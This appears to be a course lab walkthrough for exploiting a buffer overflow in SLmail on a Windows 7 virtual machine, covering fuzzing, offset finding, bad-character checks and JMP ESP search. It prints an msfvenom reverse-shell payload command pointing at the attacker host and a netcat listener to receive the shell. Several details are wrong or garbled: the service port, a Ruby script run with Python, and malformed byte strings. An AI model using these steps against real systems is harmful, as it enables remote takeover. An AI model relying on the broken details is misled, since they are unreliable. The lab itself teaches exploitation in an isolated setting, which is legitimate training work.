3.9 KiB
3.9 KiB
- Prepare Parrot OS and Windows 7 VM:
- Start your UTM instance with both Parrot OS (NAT mode) and Windows 7 VMs active.
- Switch Parrot OS to "Host-only network" mode and note down its IP address.
- Ensure you can ping Windows 7 VM from Parrot OS.
- Download required files:
- Download the "Scripts.zip" file from Blackboard (T2, Week 2) on your Parrot OS.
- Extract the contents of "Scripts.zip" to a convenient location, e.g.,
/opt/exploit-dev/scripts/.
- Run SLmail and Immunity Debugger (ID):
- Start SLmail on Windows 7 VM.
- Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black area > appearance > font > OEM.
- Attach SLmail to ID:
- In Immunity Debugger, go to
File > Attach..., select the SLmail process, and click 'Open'. - Set the debugger to "Running" state by clicking on the "Running" button in the toolbar.
- In Immunity Debugger, go to
- Run the fuzzer:
- Open a terminal on Parrot OS and navigate to the scripts directory.
- Run
python fuzzer.py <Windows 7 VM IP address> 49500(SLmail's default port is 49500) to start fuzzing the application. - The goal is to Crash SLmail by sending random data.
- Generate unique 4-byte patterns:
- Run
ruby pattern_create.rb <length>(e.g.,ruby pattern_create.rb 100) to generate a unique 4-byte pattern that will help in identifying the crash location.
- Run
- Find the starting offset:
- Send the generated pattern to SLmail using the fuzzer and observe where it crashes. The offset is the number of bytes before the crash location.
- Use
python pattern_offset.rb <crash_location>to calculate and confirm the offset.
- Verify the offset:
- Send a crafted payload with the correct EIP overwritten to ensure that our previous steps were accurate.
- Use
python sendshell.py <Windows 7 VM IP address> 49500 "<EIP>" "stupid string"to send the crafted payload.
- Check for space in the stack:
- Send approximately 800 bytes after the EIP location to verify there's enough space for our payload.
- Use
ruby space.rb <offset> 800to check the available space.
- Find bad characters:
- Identify byte values that cause the application to behave unexpectedly (e.g., crash or exhibit unexpected behavior).
- Use
ruby badchars.rb <Windows 7 VM IP address> 49500 <offset>to find and list bad characters.
- Create shellcode:
- Use msfvenom to create a payload (shellcode) with the appropriate architecture and privileges, excluding the bad characters identified earlier.
- Run
msfvenom -p windows/shell_reverse_tcp LHOST=<Parrot OS IP address> LPORT=443 -a x86 --bad-chars=<bad_characters> -f rawto generate the shellcode.
- Identify DLL without memory protections:
- Use
!mona modulesin Immunity Debugger to identify DLLs without memory protections. - Our target is
slmfc.dll.
- Use
- Find JMP ESP address:
- Use nasm_shell to get opcodes for JMP ESP (FF E4).
- Run
nasm_shell> ff e4to get the opcodes. - Use
!mona find -s "\xff\xe4" -m slmfc.dllto search for the FF E4 opcode in slmfc.dll and choose an address (e.g.,0x5f4a358f) as the new EIP.
- Prepare exploit script:
- Replace
Bsin the exploit script (e.g.,exploit.rb) with the address chosen earlier. - Add a NOP sled (e.g.,
\x9016) before the JMP ESP address to account for any slight miscalculations or fluctuations in memory layout. - The exploit script should look something like this:
"\x90" * 16 + "\xff\x\xe4" + "\xbe\xxx\xxxx\xxx\xxx". ReplaceBswith the chosen address.
- Replace
- Start netcat listener:
- On Parrot OS, run
nc -lvp 443to start a netcat listener on port 443.
- On Parrot OS, run
- Run exploit:
- Execute the prepared exploit script with
ruby exploit.rb <Windows 7 VM IP address> 49500. - Once the exploit triggers, you should get a shell on the Windows 7 VM.
- Execute the prepared exploit script with